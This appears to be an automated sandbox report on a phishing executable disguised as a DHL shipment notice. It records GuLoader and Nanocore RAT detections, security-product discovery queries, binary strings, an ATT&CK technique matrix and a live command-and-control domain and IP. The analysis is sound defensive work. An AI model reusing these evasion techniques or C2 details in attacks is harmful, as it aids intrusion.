        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        barindex
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6396, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: RegAsm.exe, 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegAsm.exe, 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6396, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder1Process Injection112Masquerading1Input Capture11Security Software Discovery421Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion231Security Account ManagerVirtualization/Sandbox Evasion231SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsSystem Information Discovery13SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol212Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1361 Sample: nDHL_Shipment_Notification_... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 36 septnan.duckdns.org 2->36 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Potential malicious icon found 2->50 52 Found malware configuration 2->52 54 9 other signatures 2->54 8 nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe 2->8         started        11 Rotacism6.exe 2->11         started        13 Rotacism6.exe 2->13         started        signatures3 process4 signatures5 56 Writes to foreign memory regions 8->56 58 Tries to detect Any.run 8->58 60 Hides threads from debuggers 8->60 15 RegAsm.exe 1 21 8->15         started        62 Multi AV Scanner detection for dropped file 11->62 20 RegAsm.exe 11 11->20         started        22 RegAsm.exe 11->22         started        24 RegAsm.exe 10 13->24         started        process6 dnsIp7 38 septnan.duckdns.org 193.104.197.28, 49720, 49721, 49723 TELIANETTeliaCarrierEU 